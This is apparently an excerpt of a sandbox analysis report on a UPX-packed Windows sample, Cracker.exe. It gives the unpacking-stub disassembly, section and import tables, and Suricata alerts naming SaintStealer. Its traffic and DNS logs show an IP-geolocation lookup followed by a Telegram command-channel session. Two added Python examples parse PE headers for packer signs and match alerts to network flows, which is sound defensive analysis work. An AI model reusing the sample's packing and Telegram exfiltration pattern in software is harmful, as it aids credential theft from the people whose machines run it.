                                                    push esi
                                                    push edi
                                                    push ebp
                                                    dec eax
                                                    lea esi, dword ptr [FFDD70F5h]
                                                    dec eax
                                                    lea edi, dword ptr [esi-0031C000h]
                                                    dec eax
                                                    lea eax, dword ptr [edi+0051E7B8h]
                                                    push dword ptr [eax]
                                                    mov dword ptr [eax], 5F69D95Eh
                                                    push eax
                                                    push edi
                                                    xor ebx, ebx
                                                    xor ecx, ecx
                                                    dec eax
                                                    or ebp, FFFFFFFFh
                                                    call 00007F87C0822E75h
                                                    add ebx, ebx
                                                    je 00007F87C0822E24h
                                                    rep ret
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    rep ret
                                                    dec eax
                                                    lea eax, dword ptr [edi+ebp]
                                                    cmp ecx, 05h
                                                    mov dl, byte ptr [eax]
                                                    jbe 00007F87C0822E43h
                                                    dec eax
                                                    cmp ebp, FFFFFFFCh
                                                    jnbe 00007F87C0822E3Dh
                                                    sub ecx, 04h
                                                    mov edx, dword ptr [eax]
                                                    dec eax
                                                    add eax, 04h
                                                    sub ecx, 04h
                                                    mov dword ptr [edi], edx
                                                    dec eax
                                                    lea edi, dword ptr [edi+04h]
                                                    jnc 00007F87C0822E11h
                                                    add ecx, 04h
                                                    mov dl, byte ptr [eax]
                                                    je 00007F87C0822E32h
                                                    dec eax
                                                    inc eax
                                                    mov byte ptr [edi], dl
                                                    sub ecx, 01h
                                                    mov dl, byte ptr [eax]
                                                    dec eax
                                                    lea edi, dword ptr [edi+01h]
                                                    jne 00007F87C0822E12h
                                                    rep ret
                                                    cld
                                                    inc ecx
                                                    pop ebx
                                                    jmp 00007F87C0822E2Ah
                                                    dec eax
                                                    inc esi
                                                    mov byte ptr [edi], dl
                                                    dec eax
                                                    inc edi
                                                    mov dl, byte ptr [esi]
                                                    add ebx, ebx
                                                    jne 00007F87C0822E2Ch
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    jc 00007F87C0822E08h
                                                    lea eax, dword ptr [ecx+01h]
                                                    jmp 00007F87C0822E29h
                                                    dec eax
                                                    inc ecx
                                                    call ebx
                                                    adc eax, eax
                                                    inc ecx
                                                    call ebx
                                                    adc eax, eax
                                                    add ebx, ebx
                                                    jne 00007F87C0822E2Ch
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    jnc 00007F87C0822E06h
                                                    sub eax, 03h
                                                    jc 00007F87C0822E3Bh
                                                    shl eax, 08h
                                                    Programming Language:
                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x547000 | 0x5b4 | UPX2
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x520000 | 0x14850 | UPX1
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5475b4 | 0x24 | UPX2
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x5461d0 | 0x28 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5463c0 | 0x140 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x31c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x31d000 | 0x22a000 | 0x229600 | 9fa353cad44e6c0a6db2598e5a3a3554 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX2 | 0x547000 | 0x1000 | 0x600 | 26109ef07c8e9de0ec4d5d7876e18dec | False | 0.3841145833333333 | data | 3.8874308360620655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
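The section table above is what a triage script reads to decide that a sample is packed before any unpacking is attempted: UPX0 has a 0x31c000-byte virtual range but zero raw bytes (the destination the stub decompresses into), the entry point 0x140545f00 sits in UPX1 rather than in the first code section, and every code section is writable as well as executable. The following is an added example, not code from the Joe Sandbox report or from the sample; it walks a PE32+ header with the standard library only and applies exactly those heuristics. SAMPLE_PE is a constructed header that reproduces the report's section table, entry point and image base and carries no code or data from Cracker.exe.

```python
"""Minimal PE32+ header walk plus the packer heuristics visible in the section table.
Added example, not part of the Joe Sandbox report; SAMPLE_PE is a constructed header."""
import struct
from dataclasses import dataclass

IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = struct.Struct("<HHIIIHH")           # IMAGE_FILE_HEADER, 20 bytes


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    def contains_rva(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + max(self.virtual_size, self.raw_size)

    @property
    def executable(self) -> bool:
        return bool(self.characteristics & IMAGE_SCN_MEM_EXECUTE)

    @property
    def writable(self) -> bool:
        return bool(self.characteristics & IMAGE_SCN_MEM_WRITE)


@dataclass
class PEInfo:
    entry_point: int       # RVA, as stored in AddressOfEntryPoint
    image_base: int
    sections: list


def parse_pe(data: bytes) -> PEInfo:
    """DOS header -> e_lfanew -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    _machine, nsections, _ts, _symtab, _nsyms, opt_size, _flags = COFF_HDR.unpack_from(data, pe_off + 4)
    opt_off = pe_off + 4 + COFF_HDR.size
    if struct.unpack_from("<H", data, opt_off)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry_point = struct.unpack_from("<I", data, opt_off + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt_off + 24)[0]
    sections = []
    for i in range(nsections):
        f = SECTION_HDR.unpack_from(data, opt_off + opt_size + i * SECTION_HDR.size)
        # f = (Name, VirtualSize, VirtualAddress, SizeOfRawData, ..., Characteristics)
        sections.append(Section(f[0].rstrip(b"\0").decode("ascii", "replace"), f[2], f[1], f[3], f[9]))
    return PEInfo(entry_point, image_base, sections)


def section_for_rva(pe: PEInfo, rva: int):
    return next((s for s in pe.sections if s.contains_rva(rva)), None)


def packer_indicators(pe: PEInfo) -> list:
    """Heuristics only: an empty list means none fired, not that the file is clean."""
    hits = []
    names = [s.name for s in pe.sections]
    if any(n.startswith("UPX") for n in names):
        hits.append("UPX section names: " + ", ".join(names))
    first = pe.sections[0]
    if first.raw_size == 0 and first.virtual_size >= 0x10000 and first.executable:
        hits.append(f"{first.name}: 0 raw bytes but 0x{first.virtual_size:x} virtual and executable (unpack destination)")
    exec_secs = [s for s in pe.sections if s.executable]
    ep_sec = section_for_rva(pe, pe.entry_point)
    if len(exec_secs) > 1 and ep_sec is exec_secs[-1]:
        hits.append(f"entry point 0x{pe.entry_point:x} lies in the last executable section {ep_sec.name} (stub runs first)")
    wx = [s.name for s in pe.sections if s.writable and s.executable]
    if wx:
        hits.append("writable+executable sections: " + ", ".join(wx))
    return hits


def _build_sample_pe() -> bytes:
    """Constructed header mirroring the report's table; these are not bytes from Cracker.exe."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = COFF_HDR.pack(0x8664, 3, 0x672C8260, 0, 0, 240, 0x0022)        # x64, 3 sections, EXECUTABLE|LARGE_ADDRESS_AWARE
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                 # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x545F00)                             # AddressOfEntryPoint (RVA)
    struct.pack_into("<Q", opt, 24, 0x140000000)                          # ImageBase
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    rows = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, Characteristics
        (b"UPX0", 0x31C000, 0x1000, 0x0, IMAGE_SCN_CNT_UNINITIALIZED_DATA | rwx),
        (b"UPX1", 0x22A000, 0x31D000, 0x229600, IMAGE_SCN_CNT_INITIALIZED_DATA | rwx),
        (b"UPX2", 0x1000, 0x547000, 0x600, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    table = b"".join(SECTION_HDR.pack(n, vs, va, rs, 0, 0, 0, 0, 0, ch) for n, vs, va, rs, ch in rows)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


SAMPLE_PE = _build_sample_pe()

if __name__ == "__main__":
    info = parse_pe(SAMPLE_PE)
    print(f"entry point 0x{info.image_base + info.entry_point:x} lies in {section_for_rva(info, info.entry_point).name}")
    for hit in packer_indicators(info):
        print(" -", hit)
```

On the constructed header all four indicators fire. The same RVA lookup also explains the data-directory table: the import and base-relocation directories (0x547000 and 0x5475b4) resolve to UPX2, the TLS and load-config directories to UPX1, which is why a UPX-packed image lists only the stub's handful of imports until it is unpacked.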
DLL | Import
advapi32.dll | FreeSid
api-ms-win-crt-heap-l1-1-0.dll | free
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
api-ms-win-crt-math-l1-1-0.dll | log
api-ms-win-crt-runtime-l1-1-0.dll | exit
api-ms-win-crt-stdio-l1-1-0.dll | _set_fmode
api-ms-win-crt-string-l1-1-0.dll | strlen
api-ms-win-crt-time-l1-1-0.dll | _localtime64_s
api-ms-win-crt-utility-l1-1-0.dll | qsort
bcrypt.dll | BCryptGenRandom
crypt32.dll | CertOpenStore
gdi32.dll | DeleteDC
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
ntdll.dll | RtlUnwindEx
ole32.dll | CoInitializeEx
oleaut32.dll | VariantClear
rstrtmgr.dll | RmGetList
secur32.dll | DecryptMessage
user32.dll | GetMonitorInfoW
ws2_32.dll | bind
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-08T11:43:33.636300+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49728 | TCP
2024-11-08T11:44:11.715081+0100 | 2039009 | ET MALWARE Win32/SaintStealer CnC Response | 1 | 149.154.167.220 | 443 | 192.168.2.8 | 49732 | TCP
2024-11-08T11:44:12.186266+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.8 | 49733 | TCP
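The alert table above and the per-packet connection table that follows are two views of the same capture, and the first thing an analyst does is join them: fold the packet rows into bidirectional flows and hang each alert on the flow whose endpoint pair it names, so that the "SaintStealer CnC Response" hit can be read as a property of the 192.168.2.8:49732 to 149.154.167.220:443 TLS session rather than as an isolated line. The code below is an added example, not part of the Joe Sandbox report; PACKETS_TEXT and ALERTS_TEXT are constructed from a subset of rows of the report's two tables, re-encoded pipe-separated for parsing. The first packet seen fixes which endpoint is the client, alerts are matched on the endpoint pair, and the time window only guards against ephemeral-port reuse (the packet excerpt ends before the 49732 session does, so a zero tolerance would reject a genuine match).

```python
"""Rebuild bidirectional flows from per-packet records and pin Suricata alerts onto them.
Added example, not part of the Joe Sandbox report; the sample rows are constructed from the report's tables."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

CET = timezone(timedelta(hours=1))   # packet table is stamped CET, alert table +0100


@dataclass
class Packet:
    ts: datetime
    src: tuple   # (ip, port)
    dst: tuple


@dataclass
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src: tuple
    dst: tuple


@dataclass
class Flow:
    client: tuple          # endpoint that sent the first packet
    server: tuple
    first_seen: datetime
    last_seen: datetime
    to_server: int = 0
    to_client: int = 0
    alerts: list = field(default_factory=list)


def parse_packet_ts(text: str) -> datetime:
    """'Nov 8, 2024 11:44:09.553003073 CET' -> aware datetime; nanoseconds trimmed to microseconds."""
    body, frac = text.rsplit(" CET", 1)[0].rsplit(".", 1)
    return datetime.strptime(f"{body}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f").replace(tzinfo=CET)


def parse_packets(text: str) -> list:
    out = []
    for line in text.strip().splitlines():
        ts, sport, dport, sip, dip = line.split("|")
        out.append(Packet(parse_packet_ts(ts), (sip, int(sport)), (dip, int(dport))))
    return out


def parse_alerts(text: str) -> list:
    out = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, sip, sport, dip, dport = line.split("|")
        out.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid), sig, int(sev),
                         (sip, int(sport)), (dip, int(dport))))
    return out


def build_flows(packets: list) -> list:
    """Packets with the same unordered endpoint pair form one flow; the earliest packet fixes the client."""
    flows = {}
    for p in sorted(packets, key=lambda p: p.ts):
        key = frozenset((p.src, p.dst))
        f = flows.get(key)
        if f is None:
            f = flows[key] = Flow(p.src, p.dst, p.ts, p.ts)
        f.last_seen = max(f.last_seen, p.ts)
        if p.src == f.client:
            f.to_server += 1
        else:
            f.to_client += 1
    return list(flows.values())


def attach_alerts(flows: list, alerts: list, tolerance=timedelta(seconds=30)) -> list:
    """Match on endpoint pair; the window only guards against port reuse. Returns alerts matching no flow."""
    unmatched = []
    for a in alerts:
        for f in flows:
            if {a.src, a.dst} == {f.client, f.server} and f.first_seen - tolerance <= a.ts <= f.last_seen + tolerance:
                f.alerts.append(a)
                break
        else:
            unmatched.append(a)
    return unmatched


def triage(packets_text: str, alerts_text: str):
    flows = build_flows(parse_packets(packets_text))
    return flows, attach_alerts(flows, parse_alerts(alerts_text))


# Constructed from rows of the report's tables (a subset; the real packet table runs on past these rows).
PACKETS_TEXT = """
Nov 8, 2024 11:43:50.179363966 CET|49731|80|192.168.2.8|108.181.61.49
Nov 8, 2024 11:43:50.184230089 CET|80|49731|108.181.61.49|192.168.2.8
Nov 8, 2024 11:43:50.185416937 CET|49731|80|192.168.2.8|108.181.61.49
Nov 8, 2024 11:43:51.342067957 CET|80|49731|108.181.61.49|192.168.2.8
Nov 8, 2024 11:44:09.553003073 CET|49732|443|192.168.2.8|149.154.167.220
Nov 8, 2024 11:44:09.553045034 CET|443|49732|149.154.167.220|192.168.2.8
Nov 8, 2024 11:44:09.566926003 CET|49732|443|192.168.2.8|149.154.167.220
Nov 8, 2024 11:44:10.423439980 CET|443|49732|149.154.167.220|192.168.2.8
Nov 8, 2024 11:44:10.565045118 CET|443|49732|149.154.167.220|192.168.2.8
"""
ALERTS_TEXT = """
2024-11-08T11:43:33.636300+0100|2022930|ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow|1|172.202.163.200|443|192.168.2.8|49728
2024-11-08T11:44:11.715081+0100|2039009|ET MALWARE Win32/SaintStealer CnC Response|1|149.154.167.220|443|192.168.2.8|49732
"""

if __name__ == "__main__":
    flows, unmatched = triage(PACKETS_TEXT, ALERTS_TEXT)
    for f in flows:
        sids = [a.sid for a in f.alerts] or ["-"]
        print(f"{f.client[0]}:{f.client[1]} -> {f.server[0]}:{f.server[1]}  "
              f"{f.to_server} out / {f.to_client} in  alerts={sids}")
    for a in unmatched:
        print(f"SID {a.sid}: no flow in this excerpt for {a.src[0]}:{a.src[1]} -> {a.dst[0]}:{a.dst[1]}")
```

Run against the excerpt, the 2039009 alert lands on the port-443 session and the plain-HTTP session to 108.181.61.49:80 carries none, while the 2022930 alert comes back unmatched because its client port 49728 does not occur in the rows shown; in a full capture that line tells you which connection to go and look at next.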
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 11:43:50.179363966 CET | 49731 | 80 | 192.168.2.8 | 108.181.61.49
Nov 8, 2024 11:43:50.184230089 CET | 80 | 49731 | 108.181.61.49 | 192.168.2.8
Nov 8, 2024 11:43:50.184322119 CET | 49731 | 80 | 192.168.2.8 | 108.181.61.49
Nov 8, 2024 11:43:50.185416937 CET | 49731 | 80 | 192.168.2.8 | 108.181.61.49
Nov 8, 2024 11:43:50.190294027 CET | 80 | 49731 | 108.181.61.49 | 192.168.2.8
Nov 8, 2024 11:43:51.342067957 CET | 80 | 49731 | 108.181.61.49 | 192.168.2.8
Nov 8, 2024 11:43:51.342855930 CET | 49731 | 80 | 192.168.2.8 | 108.181.61.49
Nov 8, 2024 11:43:51.348371983 CET | 80 | 49731 | 108.181.61.49 | 192.168.2.8
Nov 8, 2024 11:43:51.348428011 CET | 49731 | 80 | 192.168.2.8 | 108.181.61.49
Nov 8, 2024 11:44:09.553003073 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:09.553045034 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:09.553246021 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:09.566926003 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:09.566942930 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.423439980 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.423538923 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.427536011 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.427550077 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.427825928 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.478751898 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.563652039 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.563810110 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.563930035 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.563993931 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564090014 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564178944 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564224005 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564302921 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564318895 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564505100 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564528942 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564579964 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564615965 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564621925 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564663887 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564685106 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564721107 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564769983 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564799070 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564886093 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564908981 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.564922094 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.564964056 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
Nov 8, 2024 11:44:10.565036058 CET | 49732 | 443 | 192.168.2.8 | 149.154.167.220
Nov 8, 2024 11:44:10.565045118 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.8
                                                    Nov 8, 2024 11:44:10.565057039 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565082073 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565107107 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565124035 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565136909 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565149069 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565193892 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565203905 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565218925 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565218925 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565227985 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565258980 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565265894 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565323114 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565330982 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565332890 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565335989 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565356970 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565363884 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565382957 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565450907 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565473080 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565524101 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565572977 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565640926 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565680981 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565730095 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574518919 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574677944 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574702024 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574829102 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574836969 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574881077 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574888945 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574904919 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574934959 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574942112 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574969053 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574978113 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574996948 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575053930 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575177908 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575195074 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575212002 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575222015 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575267076 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586429119 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.586688995 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586728096 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.586735964 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586752892 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586771011 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586795092 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586802959 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586812973 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586829901 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586844921 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586855888 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586874008 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586921930 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586962938 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586996078 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587049961 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587066889 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587117910 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587125063 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.591492891 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.600867987 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.654649973 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.713099003 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.713124990 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.714445114 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.714545965 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.714890003 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.714972973 CET49732443192.168.2.8149.154.167.220
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Nov 8, 2024 11:43:50.169142008 CET | 56848 | 53 | 192.168.2.8 | 1.1.1.1
                                                     Nov 8, 2024 11:43:50.176264048 CET | 53 | 56848 | 1.1.1.1 | 192.168.2.8
                                                     Nov 8, 2024 11:44:08.710922003 CET | 57828 | 53 | 192.168.2.8 | 1.1.1.1
                                                     Nov 8, 2024 11:44:09.547338963 CET | 53 | 57828 | 1.1.1.1 | 192.168.2.8
                                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                     Nov 8, 2024 11:43:50.169142008 CET | 192.168.2.8 | 1.1.1.1 | 0x1fa9 | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
                                                     Nov 8, 2024 11:44:08.710922003 CET | 192.168.2.8 | 1.1.1.1 | 0x73b4 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                     Nov 8, 2024 11:43:50.176264048 CET | 1.1.1.1 | 192.168.2.8 | 0x1fa9 | No error (0) | ipwho.is |  | 108.181.61.49 | A (IP address) | IN (0x0001) | false
